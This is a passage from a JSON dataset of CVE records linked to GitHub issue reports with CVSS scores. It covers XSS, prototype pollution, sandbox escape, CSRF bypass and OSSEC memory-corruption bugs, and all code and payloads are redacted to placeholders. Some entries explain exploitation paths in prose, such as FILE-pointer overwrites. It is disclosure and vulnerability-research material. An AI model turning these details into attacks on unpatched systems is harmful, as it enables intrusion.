  61784. "description": "vulnerability report. APITAG APITAG APITAG APITAG APITAG Bug Report I have found a security vulnerability in docsify.sj. How would you like me to report it? Steps to reproduce What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: FILETAG version: npm/yarn version: Browser version: Docsify version: Docsify plugins: APITAG Please create a reproducible sandbox APITAG NUMBERTAG qq NUMBERTAG URLTAG Mention the docsify version in which this bug was not present (if any)",
  61785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61786. "severity": "MEDIUM",
  61787. "baseScore": 6.1,
  61788. "impactScore": 2.7,
  61789. "exploitabilityScore": 2.8
  61790. },
  61791. {
  61792. "CVE_ID": "CVE-2020-7689",
  61793. "Issue_Url_old": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
  61794. "Issue_Url_new": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
  61795. "Repo_new": "kelektiv/node.bcrypt.js",
  61796. "Issue_Created_At": "2020-01-25T13:41:58Z",
  61797. "description": "Some compatibility issue with emoji. When using NUMBERTAG emoji compatibility between bcrypt APITAG php and bcrypt APITAG bcryptjs is broken, whereas bcryptjs APITAG php is fine. Code to represent the issue. CODETAG The output: CODETAG Fedora NUMBERTAG bcrypt NUMBERTAG node APITAG",
  61798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61799. "severity": "HIGH",
  61800. "baseScore": 7.5,
  61801. "impactScore": 3.6,
  61802. "exploitabilityScore": 3.9
  61803. },
  61804. {
  61805. "CVE_ID": "CVE-2020-7690",
  61806. "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2795",
  61807. "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2795",
  61808. "Repo_new": "parallax/jspdf",
  61809. "Issue_Created_At": "2020-07-02T15:07:14Z",
  61810. "description": "XSS vulnerability in html method. When using the html method, it is possible to inject code that is executed in the user context. E.g. like this: ERRORTAG E.g., this line seems to be suspicious: URLTAG We need to analyze how to fix this and if there is other vulnerable code.",
  61811. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61812. "severity": "MEDIUM",
  61813. "baseScore": 6.1,
  61814. "impactScore": 2.7,
  61815. "exploitabilityScore": 2.8
  61816. },
  61817. {
  61818. "CVE_ID": "CVE-2020-7692",
  61819. "Issue_Url_old": "https://github.com/googleapis/google-oauth-java-client/issues/469",
  61820. "Issue_Url_new": "https://github.com/googleapis/google-oauth-java-client/issues/469",
  61821. "Repo_new": "googleapis/google-oauth-java-client",
  61822. "Issue_Created_At": "2020-05-26T17:52:41Z",
  61823. "description": "PKCE support?. I've been looking for information about how to enable PKCE when using the APITAG but haven't found anything. Am I missing something or is PKCE not supported (out of the box) by this library?",
  61824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  61825. "severity": "CRITICAL",
  61826. "baseScore": 9.1,
  61827. "impactScore": 5.2,
  61828. "exploitabilityScore": 3.9
  61829. },
  61830. {
  61831. "CVE_ID": "CVE-2020-7693",
  61832. "Issue_Url_old": "https://github.com/sockjs/sockjs-node/issues/252",
  61833. "Issue_Url_new": "https://github.com/sockjs/sockjs-node/issues/252",
  61834. "Repo_new": "sockjs/sockjs-node",
  61835. "Issue_Created_At": "2019-02-11T10:19:37Z",
  61836. "description": "ERR_STREAM_WRITE_AFTER_END when issuing upgrade request on non existent URL. On version NUMBERTAG and I believe in NUMBERTAG also), when issuing upgrade request on wrong URL i.e. APITAG , APITAG calls APITAG in a APITAG block and then APITAG is being called for the second time in ERRORTAG method which throws...",
  61837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61838. "severity": "MEDIUM",
  61839. "baseScore": 5.3,
  61840. "impactScore": 1.4,
  61841. "exploitabilityScore": 3.9
  61842. },
  61843. {
  61844. "CVE_ID": "CVE-2020-7696",
  61845. "Issue_Url_old": "https://github.com/DylanVann/react-native-fast-image/issues/690",
  61846. "Issue_Url_new": "https://github.com/dylanvann/react-native-fast-image/issues/690",
  61847. "Repo_new": "dylanvann/react-native-fast-image",
  61848. "Issue_Created_At": "2020-06-05T09:52:30Z",
  61849. "description": "APITAG Headers for one request are sent for all subsequent requests, even if no headers specified. Describe the bug When an image with APITAG is loaded, all other subsequent images will use the same headers. This can lead to images not showing, because the host header is wrong, and web servers will return ERRORTAG errors for the request. To Reproduce Steps to reproduce the behavior if possible, or a link to a reproduction repo NUMBERTAG Go to FILETAG and create a new endpoint NUMBERTAG Add an image with APITAG NUMBERTAG Create another endpoint at hookbin NUMBERTAG Add another image with APITAG , ensure it loads after image NUMBERTAG The request for image on endpoint NUMBERTAG will include the foo : bar headers. This is probably the reason of a lot of errors with images not properly showing in this repository. Additionally, this is a serious security issue, as signing credentials or other session tokens could be leaked to other servers. See screenshot below. Expected behavior Headers should not be reused. Screenshots Will add soon Dependency versions React Native version NUMBERTAG React version NUMBERTAG React Native Fast Image version NUMBERTAG",
  61850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61851. "severity": "MEDIUM",
  61852. "baseScore": 5.3,
  61853. "impactScore": 1.4,
  61854. "exploitabilityScore": 3.9
  61855. },
  61856. {
  61857. "CVE_ID": "CVE-2020-7699",
  61858. "Issue_Url_old": "https://github.com/richardgirges/express-fileupload/issues/236",
  61859. "Issue_Url_new": "https://github.com/richardgirges/express-fileupload/issues/236",
  61860. "Repo_new": "richardgirges/express-fileupload",
  61861. "Issue_Created_At": "2020-07-29T02:48:39Z",
  61862. "description": "Prototype Pollution. This module has prototype pollution vulnerablity and it can make DOS with APITAG option. server CODETAG exploit APITAG raw packet ERRORTAG Full description is in here URLTAG",
  61863. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61864. "severity": "CRITICAL",
  61865. "baseScore": 9.8,
  61866. "impactScore": 5.9,
  61867. "exploitabilityScore": 3.9
  61868. },
  61869. {
  61870. "CVE_ID": "CVE-2020-7710",
  61871. "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/19",
  61872. "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/19",
  61873. "Repo_new": "hacksparrow/safe-eval",
  61874. "Issue_Created_At": "2020-02-28T07:50:28Z",
  61875. "description": "Sandbox Escape. The following script can lead to safe eval sandbox escape (node APITAG ): ERRORTAG Inspired from MENTIONTAG 's vm2 escape URLTAG .",
  61876. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61877. "severity": "CRITICAL",
  61878. "baseScore": 9.8,
  61879. "impactScore": 5.9,
  61880. "exploitabilityScore": 3.9
  61881. },
  61882. {
  61883. "CVE_ID": "CVE-2020-7711",
  61884. "Issue_Url_old": "https://github.com/russellhaering/goxmldsig/issues/48",
  61885. "Issue_Url_new": "https://github.com/russellhaering/goxmldsig/issues/48",
  61886. "Repo_new": "russellhaering/goxmldsig",
  61887. "Issue_Created_At": "2019-08-14T10:53:49Z",
  61888. "description": "Crash on nil pointer dereference with malformed input. See URLTAG for background. Program which exhibits the issue: ERRORTAG Panic: ERRORTAG Potential fix: ERRORTAG",
  61889. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61890. "severity": "HIGH",
  61891. "baseScore": 7.5,
  61892. "impactScore": 3.6,
  61893. "exploitabilityScore": 3.9
  61894. },
  61895. {
  61896. "CVE_ID": "CVE-2020-7711",
  61897. "Issue_Url_old": "https://github.com/russellhaering/gosaml2/issues/59",
  61898. "Issue_Url_new": "https://github.com/russellhaering/gosaml2/issues/59",
  61899. "Repo_new": "russellhaering/gosaml2",
  61900. "Issue_Created_At": "2019-08-14T10:45:18Z",
  61901. "description": "Crash on nil pointer dereference with malformed input. I've been doing a bit of fuzzing of this package with go fuzz. I captured a valid SAML response from Okta and then had go fuzz mutate it. I have fuzzing implemented on this branch URLTAG Here's the panic in a simple test program: ERRORTAG ERRORTAG Appears to be unverified assertions can have nil parents. Appears to be fixed with this patch: ERRORTAG",
  61902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61903. "severity": "HIGH",
  61904. "baseScore": 7.5,
  61905. "impactScore": 3.6,
  61906. "exploitabilityScore": 3.9
  61907. },
  61908. {
  61909. "CVE_ID": "CVE-2020-7712",
  61910. "Issue_Url_old": "https://github.com/trentm/json/issues/144",
  61911. "Issue_Url_new": "https://github.com/trentm/json/issues/144",
  61912. "Repo_new": "trentm/json",
  61913. "Issue_Created_At": "2020-08-06T07:10:51Z",
  61914. "description": "Command Injection. POC CODETAG",
  61915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  61916. "severity": "HIGH",
  61917. "baseScore": 7.2,
  61918. "impactScore": 5.9,
  61919. "exploitabilityScore": 1.2
  61920. },
  61921. {
  61922. "CVE_ID": "CVE-2020-7755",
  61923. "Issue_Url_old": "https://github.com/dataarts/dat.gui/issues/278",
  61924. "Issue_Url_new": "https://github.com/dataarts/dat.gui/issues/278",
  61925. "Repo_new": "dataarts/dat.gui",
  61926. "Issue_Created_At": "2020-10-06T14:39:08Z",
  61927. "description": "Regular Expression Denial of Service APITAG in APITAG Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG URLTAG The APITAG vulnerability of the regex is mainly due to the sub pattern APITAG and can be exploited with the following string APITAG You can execute the following code to reproduce APITAG ERRORTAG ERRORTAG",
  61928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61929. "severity": "HIGH",
  61930. "baseScore": 7.5,
  61931. "impactScore": 3.6,
  61932. "exploitabilityScore": 3.9
  61933. },
  61934. {
  61935. "CVE_ID": "CVE-2020-7774",
  61936. "Issue_Url_old": "https://github.com/yargs/y18n/issues/96",
  61937. "Issue_Url_new": "https://github.com/yargs/y18n/issues/96",
  61938. "Repo_new": "yargs/y18n",
  61939. "Issue_Created_At": "2020-08-06T01:23:11Z",
  61940. "description": "Prototype pollution. POC APITAG",
  61941. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61942. "severity": "CRITICAL",
  61943. "baseScore": 9.8,
  61944. "impactScore": 5.9,
  61945. "exploitabilityScore": 3.9
  61946. },
  61947. {
  61948. "CVE_ID": "CVE-2020-7780",
  61949. "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/74",
  61950. "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/74",
  61951. "Repo_new": "softwaremill/akka-http-session",
  61952. "Issue_Created_At": "2020-03-10T13:22:17Z",
  61953. "description": "CSRF protection can be bypassed with empty header and empty cookie. Hi, During the penetration test of our system which is happily using akka http session the testers found out that it's possible to bypass the csrf protection. When you send a POST to an endpoint protected by APITAG and pass in an empty X XSRF TOKEN header and a XSRF TOKEN cookie with empty value, the filter will let you pass. I think is due to the check in APITAG on line NUMBERTAG if (submitted == cookie) { pass } but the value itself is not inspected and could possibly be empty. Hope this can be fixed, thanks, Willem",
  61954. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61955. "severity": "HIGH",
  61956. "baseScore": 8.8,
  61957. "impactScore": 5.9,
  61958. "exploitabilityScore": 2.8
  61959. },
  61960. {
  61961. "CVE_ID": "CVE-2020-7790",
  61962. "Issue_Url_old": "https://github.com/spatie/browsershot/issues/441",
  61963. "Issue_Url_new": "https://github.com/spatie/browsershot/issues/441",
  61964. "Repo_new": "spatie/browsershot",
  61965. "Issue_Created_At": "2020-11-03T06:15:46Z",
  61966. "description": "Issue with usage of file protocol scheme. This library is creating temporary files and loading them up with PATHTAG protocol scheme URLTAG url when APITAG function is used. Using a file protocol scheme along with headless browser such as Chrome on a server side is not a good idea and will lead to Local file disclosure APITAG Vulnerability). Other local files present on the server could be loaded when a malicious HTML is provided. Local files can be loaded either with APITAG (e.g. APITAG ) or by setting the different document location. Also, it is unlikely for the developers to check each and every page for malicious APITAG inputs. This vulnerability can be verified by using below snippet CODETAG I see it can be fixed either in the PHP code or in the JS code. I believe this small JS snippet can be added at URLTAG url to make it secure. Below code can be added to library which validates the file protocol scheme and use the APITAG puppeteer function which loads in 'about:blank' page and does not cause any harm even if malicious APITAG inputs are provided. ERRORTAG I am not sure about the performance impact this additional code will create. Let me know your comments",
  61967. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61968. "severity": "MEDIUM",
  61969. "baseScore": 5.3,
  61970. "impactScore": 1.4,
  61971. "exploitabilityScore": 3.9
  61972. },
  61973. {
  61974. "CVE_ID": "CVE-2020-7791",
  61975. "Issue_Url_old": "https://github.com/turquoiseowl/i18n/issues/387",
  61976. "Issue_Url_new": "https://github.com/turquoiseowl/i18n/issues/387",
  61977. "Repo_new": "turquoiseowl/i18n",
  61978. "Issue_Created_At": "2019-08-13T11:07:02Z",
  61979. "description": "Security vulnerability crashes app pool. MENTIONTAG During some penetration testing of our application, the testers have found a security vulnerability in the i NUMBERTAG n library that potentially crashes the app pool. I have a fix, but not the contribution rights and presumably its not a great idea to describe the issue in too much detail in public lest somebody decides to hijack this vulnerability.",
  61980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61981. "severity": "HIGH",
  61982. "baseScore": 7.5,
  61983. "impactScore": 3.6,
  61984. "exploitabilityScore": 3.9
  61985. },
  61986. {
  61987. "CVE_ID": "CVE-2020-7955",
  61988. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7160",
  61989. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7160",
  61990. "Repo_new": "hashicorp/consul",
  61991. "Issue_Created_At": "2020-01-28T23:54:33Z",
  61992. "description": "Reserved Issue Number.",
  61993. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61994. "severity": "MEDIUM",
  61995. "baseScore": 5.3,
  61996. "impactScore": 1.4,
  61997. "exploitabilityScore": 3.9
  61998. },
  61999. {
  62000. "CVE_ID": "CVE-2020-7956",
  62001. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7003",
  62002. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7003",
  62003. "Repo_new": "hashicorp/nomad",
  62004. "Issue_Created_At": "2020-01-28T19:12:39Z",
  62005. "description": "Reserved Issue Number. TBD",
  62006. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62007. "severity": "CRITICAL",
  62008. "baseScore": 9.8,
  62009. "impactScore": 5.9,
  62010. "exploitabilityScore": 3.9
  62011. },
  62012. {
  62013. "CVE_ID": "CVE-2020-8089",
  62014. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1150",
  62015. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1150",
  62016. "Repo_new": "piwigo/piwigo",
  62017. "Issue_Created_At": "2020-01-20T13:47:13Z",
  62018. "description": "Stored Cross Site Scripting vulnerability in Piwigo CMS. Description: Piwigo version NUMBERTAG is affected by stored cross site scripting vulnerability. This vulnerability exists in APITAG Name\" Field in \"group_list\" page. How to reproduce NUMBERTAG Login into the application NUMBERTAG Go to the APITAG > APITAG page from life navigation menu NUMBERTAG Click on APITAG Group\" button and then in APITAG Name\" field insert the payload APITAG and hit add button. CVSS Score: PATHTAG POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Origin: FILETAG Connection: close Cookie: APITAG phavsz NUMBERTAG APITAG APITAG APITAG FILETAG FILETAG",
  62019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62020. "severity": "MEDIUM",
  62021. "baseScore": 5.4,
  62022. "impactScore": 2.7,
  62023. "exploitabilityScore": 2.3
  62024. },
  62025. {
  62026. "CVE_ID": "CVE-2020-8112",
  62027. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1231",
  62028. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1231",
  62029. "Repo_new": "uclouvain/openjpeg",
  62030. "Issue_Created_At": "2020-01-28T11:05:53Z",
  62031. "description": "Another heap buffer overflow in libopenjp2. Hi, This overflow looks similar to NUMBERTAG but still works on latest master APITAG ERRORTAG Steps to reproduce as in NUMBERTAG the crashing input is available here PATHTAG . Thank you!",
  62032. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62033. "severity": "HIGH",
  62034. "baseScore": 8.8,
  62035. "impactScore": 5.9,
  62036. "exploitabilityScore": 2.8
  62037. },
  62038. {
  62039. "CVE_ID": "CVE-2020-8116",
  62040. "Issue_Url_old": "https://github.com/sindresorhus/dot-prop/issues/63",
  62041. "Issue_Url_new": "https://github.com/sindresorhus/dot-prop/issues/63",
  62042. "Repo_new": "sindresorhus/dot-prop",
  62043. "Issue_Created_At": "2020-08-12T09:55:49Z",
  62044. "description": "Please backport CVETAG security fix to NUMBERTAG Based on the severity of CVETAG URLTAG and the fact that NUMBERTAG is still very commonly used as a dependency, I would like to kindly request for the fix URLTAG to be backported to NUMBERTAG and released as (presumably NUMBERTAG Would this be possible? Many thanks in advance.",
  62045. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  62046. "severity": "HIGH",
  62047. "baseScore": 7.3,
  62048. "impactScore": 3.4,
  62049. "exploitabilityScore": 3.9
  62050. },
  62051. {
  62052. "CVE_ID": "CVE-2020-8203",
  62053. "Issue_Url_old": "https://github.com/lodash/lodash/issues/4874",
  62054. "Issue_Url_new": "https://github.com/lodash/lodash/issues/4874",
  62055. "Repo_new": "lodash/lodash",
  62056. "Issue_Created_At": "2020-07-24T03:51:51Z",
  62057. "description": "CVETAG is not modified in FILETAG . URLTAG issue: URLTAG description: the issue is modified in FILETAG since NUMBERTAG but not modified util APITAG Could anyone modify it? Thanks~",
  62058. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62059. "severity": "HIGH",
  62060. "baseScore": 7.4,
  62061. "impactScore": 5.2,
  62062. "exploitabilityScore": 2.2
  62063. },
  62064. {
  62065. "CVE_ID": "CVE-2020-8203",
  62066. "Issue_Url_old": "https://github.com/lodash/lodash/issues/4744",
  62067. "Issue_Url_new": "https://github.com/lodash/lodash/issues/4744",
  62068. "Repo_new": "lodash/lodash",
  62069. "Issue_Created_At": "2020-04-30T02:52:25Z",
  62070. "description": "Prototype pollution attack in APITAG Affects: lodash NUMBERTAG and below. By including APITAG in the path of objects to zip, APITAG can be polluted. This particularly affects beginning the path with APITAG which pollutes the global scope. This vulnerability was disclosed two days ago: URLTAG",
  62071. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62072. "severity": "HIGH",
  62073. "baseScore": 7.4,
  62074. "impactScore": 5.2,
  62075. "exploitabilityScore": 2.2
  62076. },
  62077. {
  62078. "CVE_ID": "CVE-2020-8285",
  62079. "Issue_Url_old": "https://github.com/curl/curl/issues/6255",
  62080. "Issue_Url_new": "https://github.com/curl/curl/issues/6255",
  62081. "Repo_new": "curl/curl",
  62082. "Issue_Created_At": "2020-11-27T09:33:17Z",
  62083. "description": "Stack overflow in libcurl when CURLOPT_WILDCARDMATCH is in use. ERRORTAG The reason is about NUMBERTAG files in the directory. libcurl version NUMBERTAG compiler: VS NUMBERTAG",
  62084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62085. "severity": "HIGH",
  62086. "baseScore": 7.5,
  62087. "impactScore": 3.6,
  62088. "exploitabilityScore": 3.9
  62089. },
  62090. {
  62091. "CVE_ID": "CVE-2020-8296",
  62092. "Issue_Url_old": "https://github.com/nextcloud/server/issues/17439",
  62093. "Issue_Url_new": "https://github.com/nextcloud/server/issues/17439",
  62094. "Repo_new": "nextcloud/server",
  62095. "Issue_Created_At": "2019-10-07T11:19:59Z",
  62096. "description": "Oc_credentials security?. Hi, Can i get informations about the algorithm used to hash password inside oc_credentials. I think this is synchronous hash because nextcloud need it with external storage but i\u2019m not sure ? Best regards",
  62097. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  62098. "severity": "MEDIUM",
  62099. "baseScore": 6.7,
  62100. "impactScore": 5.9,
  62101. "exploitabilityScore": 0.8
  62102. },
  62103. {
  62104. "CVE_ID": "CVE-2020-8440",
  62105. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/10",
  62106. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/10",
  62107. "Repo_new": "niteosoft/simplejobscript",
  62108. "Issue_Created_At": "2020-01-19T13:19:49Z",
  62109. "description": "FILETAG",
  62110. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62111. "severity": "CRITICAL",
  62112. "baseScore": 9.8,
  62113. "impactScore": 5.9,
  62114. "exploitabilityScore": 3.9
  62115. },
  62116. {
  62117. "CVE_ID": "CVE-2020-8442",
  62118. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1821",
  62119. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1821",
  62120. "Repo_new": "ossec/ossec-hids",
  62121. "Issue_Created_At": "2020-01-15T21:02:37Z",
  62122. "description": "OSSEC HIDS Security Audit Findings. Hi folks, I spent some free time recently auditing OSSEC. I was primarily focused on a threat model where an OSSEC agent is compromised (e.g. the agent key and assoc. counters are known) and used to attack the OSSEC server (primarily APITAG and APITAG ). Given the problem domain of OSSEC and HIDS generally I think this is fair game. I found a handful of bugs and have done my best to address the root cause, the affected versions, the impact and potential fixes in the issues I've filed. I will request CVEs for the security relevant bugs later on. In terms of rough risk levels I'd categorize the findings as follows: Informational: os_regex empty pcre2 off by one URLTAG rootcheck check rc if shell injection risk URLTAG Low: analysisd syscheck decoder msg location path injection URLTAG analysisd APITAG allows control chars in msg URLTAG analysisd APITAG bad location segfault URLTAG Med: analysisd APITAG off by one syslog URLTAG analysisd APITAG use after free ossecalert URLTAG analysisd APITAG use after free syscheck URLTAG analysisd syscheck decoder off by one read URLTAG High: analysisd rootcheck decoder heap overflow URLTAG Some caveats/context to add NUMBERTAG I'm not a professional C coder, w.r.t suggested fixes YMM NUMBERTAG I don't write exploits for a living. My assessments of exploitability/risk should be considered lower bounds NUMBERTAG This wasn't an extensive audit. I followed my nose and used some fuzzing NUMBERTAG OSSEC NUMBERTAG seems to be the earliest tag in the Github repo. I didn't dig deeper into history to see if any of these bugs affect older releases (some likely do). If you would be interested in trying to adopt fuzzing as part of your CI (or as an integration with oss fuzz, etc) I'd be happy to try and provide some notes but likely don't have the resources to implement it myself to a merge able standard of work. Thanks! You can close this top level issue as you see appropriate.",
  62123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62124. "severity": "HIGH",
  62125. "baseScore": 8.8,
  62126. "impactScore": 5.9,
  62127. "exploitabilityScore": 2.8
  62128. },
  62129. {
  62130. "CVE_ID": "CVE-2020-8442",
  62131. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1820",
  62132. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1820",
  62133. "Repo_new": "ossec/ossec-hids",
  62134. "Issue_Created_At": "2020-01-15T21:01:47Z",
  62135. "description": "analysisd rootcheck decoder: heap overflow in APITAG The APITAG rootcheck decoder ( APITAG ) allocates two fixed size heap buffers via global static vars. One, APITAG is an array of APITAG size APITAG . The other APITAG is an array of APITAG , also size APITAG . In a default build MAX_AGENTS is NUMBERTAG URLTAG When processing rootcheck messages the APITAG function is called to find a file pointer for the given agent name. In APITAG a while loop with a index counter i is used to try and find an index of APITAG that matches the provided agent name. No check of i is made to ensure that it stays within the bound of APITAG , resulting in a straight forward heap buffer overflow when more than APITAG syscheck update messages for distinct agent names are processed. This code was introduced in the original rootcheck functionality with APITAG on Oct NUMBERTAG I believe it affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write MAX_AGENT rootcheck update messages with distinct message agent names. While APITAG always sets the agent name portion of messages passed on to APITAG with a prefix out of the attackers control based on the agent key and src IP ( APITAG ) the portion after this prefix is attacker controlled and thus can be mutated to make more than MAX_AGENT unique names that will be decoded by the APITAG . Notably this bug has fairly high potential for exploitation. The attacker is able to overwrite a FILE pointer with a pointer to the agent name, which is mostly attacker controlled (minus a short prefix), and can be up to NUMBERTAG strlen(prefix) bytes long. I'm definitely able to reliably segfault the APITAG process with this bug though I was personally unable to reliable control of execution. Overwriting a FILE pointer with a pointer to attacker controlled data is a common way to achieve reliably code execution. There are many pointers in the FILE struct to be abused and while libc has added some hardening it isn't applicable for versions NUMBERTAG or lower (e.g. Ubuntu NUMBERTAG and bypass techniques are well known. URLTAG URLTAG URLTAG In this case there are two additional challenges to exploiting the bug that stumped me but may not stump someone who is actually good at writing exploits NUMBERTAG Since the protocol is all string based you can't use a null byte in payload that overwrites the FILE contents which makes specifying valid pointers on NUMBERTAG ery challenging. APITAG get one terminating NUMBERTAG at the end of your payload which can be used for the high order byte of a pointer, but it's still a challenge to find useful targets in high mem NUMBERTAG Getting your overwritten APITAG entry used with fseek requires being able to specify the APITAG name at the matching i value. Usually this is the first bytes of a valid FILE and so I _think_ the attacker needs full control of the agent name to be able to specify a match (usually APITAG or similar. The value is predictable based on rootcheck's open flags). If I'm correct this might mean the segfault is remotely triggerable but exploiting the FILE overwrite may not be. To fix this the while conditions in APITAG and APITAG should be rewritten to short circuit if APITAG : E.g. instead of: APITAG Use: APITAG I think it's worth noting that this bug is nearly identical to the one reported by Paul Southerington in the syscheck decoder, patched in Feb NUMBERTAG URLTAG It has looks like this was fixed in OSSEC's Wazuh's fork at some point, though potentially without realizing it fixed a vulnerability: URLTAG This seems like a place where process improvement could help. Receiving vulnerability reports should trigger a search through the codebase for equivalent problems.",
  62136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62137. "severity": "HIGH",
  62138. "baseScore": 8.8,
  62139. "impactScore": 5.9,
  62140. "exploitabilityScore": 2.8
  62141. },
  62142. {
  62143. "CVE_ID": "CVE-2020-8443",
  62144. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1816",
  62145. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1816",
  62146. "Repo_new": "ossec/ossec-hids",
  62147. "Issue_Created_At": "2020-01-15T21:00:33Z",
  62148. "description": "analysisd: APITAG off by one heap overflow cleaning syslog msgs.. In APITAG the APITAG function performs pattern matching and if applicable, tries to decode syslog messages to populate some lf structure fields according to the syslog data. URLTAG When a message contains leading text matching the patterns expected for syslog, and contains a substring like APITAG in the correct location APITAG will attempt to remove it by advancing the APITAG pointer beyond the end of the substring: URLTAG The code is careful about checking the result from strstr when advancing to the expected closing APITAG , however it makes an assumption that there must be a non null character following the APITAG when it subsequently advances the pieces pointer by NUMBERTAG URLTAG If a message like APITAG is processed APITAG will advance beyond the terminating null byte of APITAG , resulting in a heap overflow when operating on the APITAG pointer subsequently during decoding. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . This is triggerable via an authenticated client through the APITAG . The client needs only write a message to the remote server of any queue type that will match the expected syslog format and authority substring, but end immediately after the APITAG . I think the best fix is to change the pieces pointer to be incremented by NUMBERTAG instead of NUMBERTAG or to update the strstr check for APITAG instead of just APITAG .",
  62149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62150. "severity": "CRITICAL",
  62151. "baseScore": 9.8,
  62152. "impactScore": 5.9,
  62153. "exploitabilityScore": 3.9
  62154. },
  62155. {
  62156. "CVE_ID": "CVE-2020-8444",
  62157. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1817",
  62158. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1817",
  62159. "Repo_new": "ossec/ossec-hids",
  62160. "Issue_Created_At": "2020-01-15T21:00:51Z",
  62161. "description": "analysisd: APITAG heap use after free with ossec alert msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a received message from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any messages that meet the ossec alert decoder's criteria are given to that decoder for further processing. After processing an ossec alert msg from a client the ossec alert decoder will free the APITAG pointer at the end of its processing, replacing it with a new pointer and populating APITAG : URLTAG Though the APITAG function returns NULL and not APITAG further rule processing of the lf struct occurs during APITAG because of the APITAG set by the decoder before freeing APITAG . URLTAG If any subsequent processing associated with the generated rule accesses the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing the APITAG . I believe the bug was introduced in APITAG on July NUMBERTAG and affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write a ossecalert message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may 